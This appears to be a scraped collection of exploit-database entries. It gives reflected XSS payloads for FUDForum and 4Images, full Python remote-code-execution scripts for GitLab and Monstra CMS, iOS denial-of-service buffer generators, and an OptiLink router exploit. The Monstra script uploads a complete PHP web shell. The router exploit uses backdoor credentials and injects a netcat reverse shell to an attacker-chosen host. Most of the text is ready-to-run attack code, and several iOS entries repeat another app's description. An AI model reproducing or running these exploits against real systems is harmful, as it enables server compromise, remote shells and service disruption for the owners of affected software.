ISHACK AI BOT

# Exploit Title: FUDForum 3.1.0 - 'srch' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27519 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "srch" parameter. -Payload used: x" onmouseover=alert(1) x=" -Steps to reproduce: 1- goto https://localhost/fudforum/index.php?t=search& 2- In "forum search" option, paste XSS payload 3- Hover your mouse to "x" and XSS will get triggered

# Exploit Title: FUDForum 3.1.0 - 'author' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: http://fudforum.org/ # Software Link: https://sourceforge.net/projects/fudforum/files/FUDforum_3.1.0.zip/download # Version: FUDForum 3.1.0 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27520 -Description: A cross-site scripting (XSS) issue in FUDForum 3.1.0 allows remote attackers to inject JavaScript via index.php in the "author" parameter. -Payload used: y" onmouseover=alert(2) y=" -Steps to reproduce: 1- goto https://localhost/fudforum/index.php?t=search& 2- In the "Filter by User" search option, paste XSS payload 3- Hover your mouse to "y" and XSS will get triggered

# Exploit Title: Gitlab 13.9.3 - Remote Code Execution (Authenticated) # Date: 02/06/2021 # Exploit Author: enox # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/ # Version: < 13.9.4 # Tested On: Ubuntu 20.04 # Environment: Gitlab 13.9.1 CE # Credits: https://hackerone.com/reports/1125425 #!/usr/bin/python3 import requests from bs4 import BeautifulSoup import random import os import argparse parser = argparse.ArgumentParser(description='GitLab < 13.9.4 RCE') parser.add_argument('-u', help='Username', required=True) parser.add_argument('-p', help='Password', required=True) parser.add_argument('-c', help='Command', required=True) parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) args = parser.parse_args() username = args.u password = args.p gitlab_url = args.t command = args.c session = requests.Session() # Authenticating print("[1] Authenticating") r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll('meta')[16].get("content") login_form = { "authenticity_token": token, "user[login]": username, "user[password]": password, "user[remember_me]": "0" } r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) if r.status_code != 200: exit(f"Login Failed:{r.text}") else: print("Successfully Authenticated") # Creating Project print("[2] Creating Project") r = session.get(f"{gitlab_url}/projects/new") soup = BeautifulSoup(r.text, features="lxml") project_token = soup.findAll('meta')[16].get("content") project_token = project_token.replace("==", "%3D%3D") project_token = project_token.replace("+", "%2B") project_name = f'project{random.randrange(1, 10000)}' cookies = {'sidebar_collapsed': 'false','event_filter': 'all','hide_auto_devops_implicitly_enabled_banner_1': 'false','_gitlab_session': session.cookies['_gitlab_session'],} payload=f"utf8=%E2%9C%93&authenticity_token={project_token}&project%5Bci_cd_only%5D=false&project%5Bname%5D={project_name}&project%5Bpath%5D={project_name}&project%5Bdescription%5D=&project%5Bvisibility_level%5D=20" r = session.post(gitlab_url+'/projects', data=payload, cookies=cookies, verify=False) if "The change you requested was rejected." in r.text: exit('Exploit failed, check input params') else: print("Successfully created project") # Cloning Wiki and Writing Files print("[3] Pushing files to the project wiki") wiki_url = f'{gitlab_url}/{username}/{project_name}.wiki.git' os.system(f"git clone {wiki_url} /tmp/project") f1 = open("/tmp/project/load1.rmd","w") f1.write('{::options syntax_highlighter="rouge" syntax_highlighter_opts="{formatter: Redis, driver: ../get_process_mem\}" /}\n\n') f1.write('~~~ ruby\n') f1.write(' def what?\n') f1.write(' 42\n') f1.write(' end\n') f1.write('~~~\n') f1.close() f2 = open("/tmp/project/load2.rmd","w") temp='{::options syntax_highlighter="rouge" syntax_highlighter_opts="{a: \'`'+command+'`\', formatter: GetProcessMem\}" /}\n\n' f2.write(temp) f2.write('~~~ ruby\n') f2.write(' def what?\n') f2.write(' 42\n') f2.write(' end\n') f2.write('~~~\n') f2.close() # It will prompt for user and pass. Enter it. os.system('cd /tmp/project && git add -A . && git commit -m "Commit69" && git push') print("Succesfully Pushed") # Cleaning Up os.system('rm -rf /tmp/project') # Triggering RCE print("[4] Triggering RCE") trigger_url=f"{gitlab_url}/{username}/{project_name}/-/wikis/load2" r = session.get(trigger_url, cookies=cookies, verify=False)

# Exploit Title: 4Images 1.8 - 'redirect' Reflected XSS # Exploit Author: Piyush Patil # Vendor Homepage: https://www.4homepages.de/ # Software Link: https://www.4homepages.de/?download=4images1.8.zip&code=81da0c7b5208e172ea83d879634f51d6 # Version: 4Images Gallery 1.8 # Tested on: Windows 10 and Kali # CVE : CVE-2021-27308 -Description: A cross-site scripting (XSS) vulnerability in the admin login panel in 4images version 1.8 allows remote attackers to inject JavaScript via the "redirect" parameter. -Steps to reproduce: 1- Goto 4images admin panel page (demo instance: https://localhost/4images/admin/index.php) 2- Enter the credentials , Turn on the intercept and click on "Login" 3- copy paste the XSS payload after redirect=./../admin/index.php%3Fsessionid=xxxxxPASTEPAYLOADHERE 4-Forward the request and you can see XSS is triggered.

# Exploit Title: Monstra CMS 3.0.4 - Remote Code Execution (Authenticated) # Date: 03.06.2021 # Exploit Author: Ron Jost (hacker5preme) # Vendor Homepage: https://monstra.org/ # Software Link: https://monstra.org/monstra-3.0.4.zip # Version: 3.0.4 # Tested on: Ubuntu 20.04 # CVE: CVE-2018-6383 # Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-6383-Exploit ''' Description: Monstra CMS through 3.0.4 has an incomplete "forbidden types" list that excludes .php (and similar) file extensions but not the .pht or .phar extension, which allows remote authenticated Admins or Editors to execute arbitrary PHP code by uploading a file, a different vulnerability than CVE-2017-18048. ''' ''' Import required modules: ''' import argparse import requests ''' User-Input: ''' my_parser = argparse.ArgumentParser(description='Exploit for CVE-2018-6383') my_parser.add_argument('-T', type=str, help='Target IP') my_parser.add_argument('-P', type=str, help='Target Port') my_parser.add_argument("-U", type=str, help="Monstra CMS Path") my_parser.add_argument('-u', type=str, help="Username") my_parser.add_argument('-p', type=str, help='Password') args = my_parser.parse_args() target_ip = args.T target_port = args.P Monstracms_path = args.U username = args.u password = args.p ''' Exploit: ''' # Cookies: session = requests.Session() url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php' cookies = session.get(url).cookies.get_dict() value = cookies['PHPSESSID'] cookies = { "__atuvc": "9%7C22", 'PHPSESSID': 'sga7s1jb0o3b7dlueh5soin8a9' } # Construct authentication header: headers = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": "http://" + target_ip, "Connection": "close", "Referer": "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php', "Upgrade-Insecure-Requests": "1"} # Construct authentication body body = { "login": username, "password": password, "login_submit": "Log In"} x = requests.post(url, headers=headers, cookies=cookies, data=body) # Construct Exploit link: url = "http://" + target_ip + ':' + target_port + Monstracms_path + 'admin/index.php?id=filesmanager' # Construct Exploit header: header = { "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "de,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------27822155982314896762160847658", "Origin": "http://" + target_ip, "Connection": "close", "Referer": "http://" + target_ip + Monstracms_path + 'admin/index.php?id=filesmanager', "Upgrade-Insecure-Requests": "1" } # Construct Exploit data: burp0_data = "-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"csrf\"\r\n\r\n1e71963993909d612c40962b401c556b70e9bb3c\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"file\"; filename=\"shell.phar\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php\n\nfunction featureShell($cmd, $cwd) {\n $stdout = array();\n\n if (preg_match(\"/^\\s*cd\\s*$/\", $cmd)) {\n // pass\n } elseif (preg_match(\"/^\\s*cd\\s+(.+)\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?><!DOCTYPE html>\n\n<html>\n\n <head>\n <meta charset=\"UTF-8\" />\n <title>p0wny@shell:~#</title>\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" />\n <style>\n html, body {\n margin: 0;\n padding: 0;\n background: #333;\n color: #eee;\n font-family: monospace;\n }\n\n *::-webkit-scrollbar-track {\n border-radius: 8px;\n background-color: #353535;\n }\n\n *::-webkit-scrollbar {\n width: 8px;\n height: 8px;\n }\n\n *::-webkit-scrollbar-thumb {\n border-radius: 8px;\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\n background-color: #bcbcbc;\n }\n\n #shell {\n background: #222;\n max-width: 800px;\n margin: 50px auto 0 auto;\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\n font-size: 10pt;\n display: flex;\n flex-direction: column;\n align-items: stretch;\n }\n\n #shell-content {\n height: 500px;\n overflow: auto;\n padding: 5px;\n white-space: pre-wrap;\n flex-grow: 1;\n }\n\n #shell-logo {\n font-weight: bold;\n color: #FF4180;\n text-align: center;\n }\n\n @media (max-width: 991px) {\n #shell-logo {\n font-size: 6px;\n margin: -25px 0;\n }\n\n html, body, #shell {\n height: 100%;\n width: 100%;\n max-width: none;\n }\n\n #shell {\n margin-top: 0;\n }\n }\n\n @media (max-width: 767px) {\n #shell-input {\n flex-direction: column;\n }\n }\n\n @media (max-width: 320px) {\n #shell-logo {\n font-size: 5px;\n }\n }\n\n .shell-prompt {\n font-weight: bold;\n color: #75DF0B;\n }\n\n .shell-prompt > span {\n color: #1BC9E7;\n }\n\n #shell-input {\n display: flex;\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\n border-top: rgba(255, 255, 255, .05) solid 1px;\n }\n\n #shell-input > label {\n flex-grow: 0;\n display: block;\n padding: 0 5px;\n height: 30px;\n line-height: 30px;\n }\n\n #shell-input #shell-cmd {\n height: 30px;\n line-height: 30px;\n border: none;\n background: transparent;\n color: #eee;\n font-family: monospace;\n font-size: 10pt;\n width: 100%;\n align-self: center;\n }\n\n #shell-input div {\n flex-grow: 1;\n align-items: stretch;\n }\n\n #shell-input input {\n outline: none;\n }\n </style>\n\n <script>\n var CWD = null;\n var commandHistory = [];\n var historyPosition = 0;\n var eShellCmdInput = null;\n var eShellContent = null;\n\n function _insertCommand(command) {\n eShellContent.innerHTML += \"\\n\\n\";\n eShellContent.innerHTML += '<span class=\\\"shell-prompt\\\">' + genPrompt(CWD) + '</span> ';\n eShellContent.innerHTML += escapeHtml(command);\n eShellContent.innerHTML += \"\\n\";\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _insertStdout(stdout) {\n eShellContent.innerHTML += escapeHtml(stdout);\n eShellContent.scrollTop = eShellContent.scrollHeight;\n }\n\n function _defer(callback) {\n setTimeout(callback, 0);\n }\n\n function featureShell(command) {\n\n _insertCommand(command);\n if (/^\\s*upload\\s+[^\\s]+\\s*$/.test(command)) {\n featureUpload(command.match(/^\\s*upload\\s+([^\\s]+)\\s*$/)[1]);\n } else if (/^\\s*clear\\s*$/.test(command)) {\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\n eShellContent.innerHTML = '';\n } else {\n makeRequest(\"?feature=shell\", {cmd: command, cwd: CWD}, function (response) {\n if (response.hasOwnProperty('file')) {\n featureDownload(response.name, response.file)\n } else {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n }\n });\n }\n }\n\n function featureHint() {\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\n\n function _requestCallback(data) {\n if (data.files.length <= 1) return; // no completion\n\n if (data.files.length === 2) {\n if (type === 'cmd') {\n eShellCmdInput.value = data.files[0];\n } else {\n var currentValue = eShellCmdInput.value;\n eShellCmdInput.value = currentValue.replace(/([^\\s]*)$/, data.files[0]);\n }\n } else {\n _insertCommand(eShellCmdInput.value);\n _insertStdout(data.files.join(\"\\n\"));\n }\n }\n\n var currentCmd = eShellCmdInput.value.split(\" \");\n var type = (currentCmd.length === 1) ? \"cmd\" : \"file\";\n var fileName = (type === \"cmd\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\n\n makeRequest(\n \"?feature=hint\",\n {\n filename: fileName,\n cwd: CWD,\n type: type\n },\n _requestCallback\n );\n\n }\n\n function featureDownload(name, file) {\n var element = document.createElement('a');\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\n element.setAttribute('download', name);\n element.style.display = 'none';\n document.body.appendChild(element);\n element.click();\n document.body.removeChild(element);\n _insertStdout('Done.');\n }\n\n function featureUpload(path) {\n var element = document.createElement('input');\n element.setAttribute('type', 'file');\n element.style.display = 'none';\n document.body.appendChild(element);\n element.addEventListener('change', function () {\n var promise = getBase64(element.files[0]);\n promise.then(function (file) {\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\n _insertStdout(response.stdout.join(\"\\n\"));\n updateCwd(response.cwd);\n });\n }, function () {\n _insertStdout('An unknown client-side error occurred.');\n });\n });\n element.click();\n document.body.removeChild(element);\n }\n\n function getBase64(file, onLoadCallback) {\n return new Promise(function(resolve, reject) {\n var reader = new FileReader();\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\n reader.onerror = reject;\n reader.readAsDataURL(file);\n });\n }\n\n function genPrompt(cwd) {\n cwd = cwd || \"~\";\n var shortCwd = cwd;\n if (cwd.split(\"/\").length > 3) {\n var splittedCwd = cwd.split(\"/\");\n shortCwd = \"\xe2\x80\xa6/\" + splittedCwd[splittedCwd.length-2] + \"/\" + splittedCwd[splittedCwd.length-1];\n }\n return \"p0wny@shell:<span title=\\\"\" + cwd + \"\\\">\" + shortCwd + \"</span>#\";\n }\n\n function updateCwd(cwd) {\n if (cwd) {\n CWD = cwd;\n _updatePrompt();\n return;\n }\n makeRequest(\"?feature=pwd\", {}, function(response) {\n CWD = response.cwd;\n _updatePrompt();\n });\n\n }\n\n function escapeHtml(string) {\n return string\n .replace(/&/g, \"&\")\n .replace(/</g, \"<\")\n .replace(/>/g, \">\");\n }\n\n function _updatePrompt() {\n var eShellPrompt = document.getElementById(\"shell-prompt\");\n eShellPrompt.innerHTML = genPrompt(CWD);\n }\n\n function _onShellCmdKeyDown(event) {\n switch (event.key) {\n case \"Enter\":\n featureShell(eShellCmdInput.value);\n insertToHistory(eShellCmdInput.value);\n eShellCmdInput.value = \"\";\n break;\n case \"ArrowUp\":\n if (historyPosition > 0) {\n historyPosition--;\n eShellCmdInput.blur();\n eShellCmdInput.value = commandHistory[historyPosition];\n _defer(function() {\n eShellCmdInput.focus();\n });\n }\n break;\n case \"ArrowDown\":\n if (historyPosition >= commandHistory.length) {\n break;\n }\n historyPosition++;\n if (historyPosition === commandHistory.length) {\n eShellCmdInput.value = \"\";\n } else {\n eShellCmdInput.blur();\n eShellCmdInput.focus();\n eShellCmdInput.value = commandHistory[historyPosition];\n }\n break;\n case 'Tab':\n event.preventDefault();\n featureHint();\n break;\n }\n }\n\n function insertToHistory(cmd) {\n commandHistory.push(cmd);\n historyPosition = commandHistory.length;\n }\n\n function makeRequest(url, params, callback) {\n function getQueryString() {\n var a = [];\n for (var key in params) {\n if (params.hasOwnProperty(key)) {\n a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n }\n }\n return a.join(\"&\");\n }\n var xhr = new XMLHttpRequest();\n xhr.open(\"POST\", url, true);\n xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n xhr.onreadystatechange = function() {\n if (xhr.readyState === 4 && xhr.status === 200) {\n try {\n var responseJson = JSON.parse(xhr.responseText);\n callback(responseJson);\n } catch (error) {\n alert(\"Error while parsing response: \" + error);\n }\n }\n };\n xhr.send(getQueryString());\n }\n\n document.onclick = function(event) {\n event = event || window.event;\n var selection = window.getSelection();\n var target = event.target || event.srcElement;\n\n if (target.tagName === \"SELECT\") {\n return;\n }\n\n if (!selection.toString()) {\n eShellCmdInput.focus();\n }\n };\n\n window.onload = function() {\n eShellCmdInput = document.getElementById(\"shell-cmd\");\n eShellContent = document.getElementById(\"shell-content\");\n updateCwd();\n eShellCmdInput.focus();\n };\n </script>\n </head>\n\n <body>\n <div id=\"shell\">\n <pre id=\"shell-content\">\n <div id=\"shell-logo\">\n ___ ____ _ _ _ _ _ <span></span>\n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|<span></span>\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|<span></span>\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| <span></span>\n|_| |___/ \\____/ <span></span>\n </div>\n </pre>\n <div id=\"shell-input\">\n <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n <div>\n <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n </div>\n </div>\n </div>\n </body>\n\n</html>\n\r\n-----------------------------27822155982314896762160847658\r\nContent-Disposition: form-data; name=\"upload_file\"\r\n\r\nUpload\r\n-----------------------------27822155982314896762160847658--\r\n" # Exploit: x = requests.post(url, headers=header, cookies=cookies, data=burp0_data) # Finish: print('') print('Please login in your webrowser and then open the following URL:') print('File uploaded to: http://' + target_ip + ':' + target_port + Monstracms_path + 'public/uplaods/shell.phar') print('')

# Exploit Title: Gitlab 13.10.2 - Remote Code Execution (Authenticated) # Date: 04/06/2021 # Exploit Author: enox # Vendor Homepage: https://about.gitlab.com/ # Software Link: https://gitlab.com/ # Version: < 13.10.3 # Tested On: Ubuntu 20.04 # Environment: Gitlab 13.10.2 CE # Credits: https://hackerone.com/reports/1154542 import requests from bs4 import BeautifulSoup import random import os import argparse parser = argparse.ArgumentParser(description='GitLab < 13.10.3 RCE') parser.add_argument('-u', help='Username', required=True) parser.add_argument('-p', help='Password', required=True) parser.add_argument('-c', help='Command', required=True) parser.add_argument('-t', help='URL (Eg: http://gitlab.example.com)', required=True) args = parser.parse_args() username = args.u password = args.p gitlab_url = args.t command = args.c session = requests.Session() # Authenticating print("[1] Authenticating") r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") token = soup.findAll('meta')[16].get("content") login_form = { "authenticity_token": token, "user[login]": username, "user[password]": password, "user[remember_me]": "0" } r = session.post(f"{gitlab_url}/users/sign_in", data=login_form) if r.status_code != 200: exit(f"Login Failed:{r.text}") else: print("Successfully Authenticated") # payload creation print("[2] Creating Payload ") payload = f"\" . qx{{{command}}} . \\\n" f1 = open("/tmp/exploit","w") f1.write('(metadata\n') f1.write(' (Copyright "\\\n') f1.write(payload) f1.write('" b ") )') f1.close() # Checking if djvumake is installed check = os.popen('which djvumake').read() if (check == ""): exit("djvumake not installed. Install by running command : sudo apt install djvulibre-bin") # Building the payload os.system('djvumake /tmp/exploit.jpg INFO=0,0 BGjp=/dev/null ANTa=/tmp/exploit') # Uploading it print("[3] Creating Snippet and Uploading") # Getting the CSRF token r = session.get(gitlab_url + "/users/sign_in") soup = BeautifulSoup(r.text, features="lxml") csrf = soup.findAll('meta')[16].get("content") cookies = {'_gitlab_session': session.cookies['_gitlab_session']} headers = { 'User-Agent': 'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US);', 'Accept': 'application/json', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Referer': f'{gitlab_url}/projects', 'Connection': 'close', 'Upgrade-Insecure-Requests': '1', 'X-Requested-With': 'XMLHttpRequest', 'X-CSRF-Token': f'{csrf}' } files = {'file': ('exploit.jpg', open('/tmp/exploit.jpg', 'rb'), 'image/jpeg', {'Expires': '0'})} r = session.post(gitlab_url+'/uploads/user', files=files, cookies=cookies, headers=headers, verify=False) if r.text != "Failed to process image\n": exit("[-] Exploit failed") else: print("[+] RCE Triggered !!")

# Exploit Title: Color Notes 1.4 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/gt/app/color-notes/id830515136 # Version: 1.4 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Macaron Notes great notebook 5.5 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/macaron-notes-great-notebook/id1079862221 # Version: 5.5 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: OptiLink ONT1GEW GPON 2.1.11_X101 Build 1127.190306 - Remote Code Execution (Authenticated) # Date: 23/03/2021 # Exploit Authors: Developed by SecNigma and Amal. # Vendor Homepage: https://optilinknetwork.com/ # Version: ONT1GEW V2.1.11_X101 Build.1127.190306 # Mitigation: Ask the vendor to issue a router upgrade to Build.1653.210425 and above, # as they do not release the firmware to the public for some unknown reason. # Additional notes: # Tested on the following configuration. Might be suitable for other OptiLink devices with Build <= 1127.190306. # Device Name: ONT1GEW # Software Version: V2.1.11_X101 # Build Information: Build.1127.190306 # Chances are that XPONs of C-DATA company are affected too. # Our research indicated that Optilink devices are just a rebranded version of C-Data. # This exploit was tested on the following configuration. #!/usr/bin/python3 import requests import argparse import re def is_login_success(r): match=re.findall("invalid username!|bad password!|you have logined error 3 consecutive times, please relogin 1 minute later!|another user have logined in",r.text) if match: return match # Default configuration # Router address = 192.168.101.1 # LPORT = 9001 # Default Username = e8c / Backdoor / # Default Password = e8c / Credentials / parser= argparse.ArgumentParser() parser.add_argument("-t", "--target", dest = "target", default = "192.168.101.1", help="Target OptiLink Router IP") parser.add_argument("-l", "--lhost", dest = "lhost" , help="Our Local IP to catch the shell!", required=True) parser.add_argument("-lp", "--lport", dest = "lport", default = "9001", help="Our Local port for catching the shell!") parser.add_argument("-u", "--user", dest = "user", default = "e8c", help="Username of Optilink Router") parser.add_argument("-p", "--pass", dest = "passw", default = "e8c", help="Password of Optilink Router") args = parser.parse_args() target=args.target, lhost=args.lhost, lport=args.lport, user=args.user, passw=args.passw # e8c:e8c are the backdoor administrator creds to Optilink devices # Alternate backdoor credentials are adsl:realtek, admin:admin. user2="e8c" passw2="e8c" home_url="http://"+target[0]+"/boaform/admin/formLogin" print("[+] Trying to authenticate...") # Authenticate ourselves first data={'username':user, 'psd':passw} r=requests.post(home_url,data) res=is_login_success(r) if res: print("[-] Exploit failed when using the following credentials: "+str(user)+":"+str(passw)+"") print("[-] Exploit failed with the following error:") print(res) print("[!] Do you want to try to authenticate with the following credentials: "+str(user2)+":"+str(passw2)+" ?") val = input("Press y or n : ") if val[0].lower()=="y": print("[+] Trying to authenticate with the credentials "+str(user2)+":"+str(passw2)+"") # Authenticate ourselves with new creds data={'username':user2, 'psd':passw2} r=requests.post(home_url,data) res2=is_login_success(r) if res2: print("[-] Exploit failed when using the following credentials: "+str(user2)+":"+str(passw2)+"") print("[-] Exploit failed with the following error:") print(res2) print("[-] Halting Execution.") exit() else: print("Received input "+val+"") print("[-] Halting Execution.") exit() print("[+] Looks like authentication was succesful!") print("[+] Trying to fetch the WAN Name...") # Fetching Wan Name # wan_name="1_INTERNET_R_VID_***" get_wan_url = "http://"+target[0]+"/diag_ping.asp" r=requests.get(get_wan_url) match=re.findall("name=\"waninf\"><option value=\"(.*?)\">",r.text) wan_name=match[0] print("[+] Initiating Exploitation. Don't forget to start the nc listener on port "+str(lport)+"..") print("[+] I'm Waiting...Said Captain Jagdish *wink* *wink*") print("[+] If everything went right, you should've gotten a shell right now!") # Starting Exploitation # The same vulnerability exists in formPing and formTracert. # exploit_url = "http://"+target[0]+"/boaform/admin/formPing" exploit_url = "http://"+target[0]+"/boaform/admin/formTracert" # Found a new way to get reverse shell using mknod instead of mkfifo during the exploitation of this router :) # BusyBox binary used by this router was very limited and didn't had mkfifo. So, we got creative to workaround it. # The payload is available at swisskeyrepo's PayloadAllTheThings GitHub repo as Netcat BusyBox payload. # https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox post_data='target_addr="1.1.1.1+`rm+/tmp/f%3bmknod+/tmp/f+p%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+'+lhost[0]+'+'+lport[0]+'+>/tmp/f`"&waninf='+wan_name+'"' r=requests.post(exploit_url,post_data)

# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 # Version: 5.3 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 # Version: 1.4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")

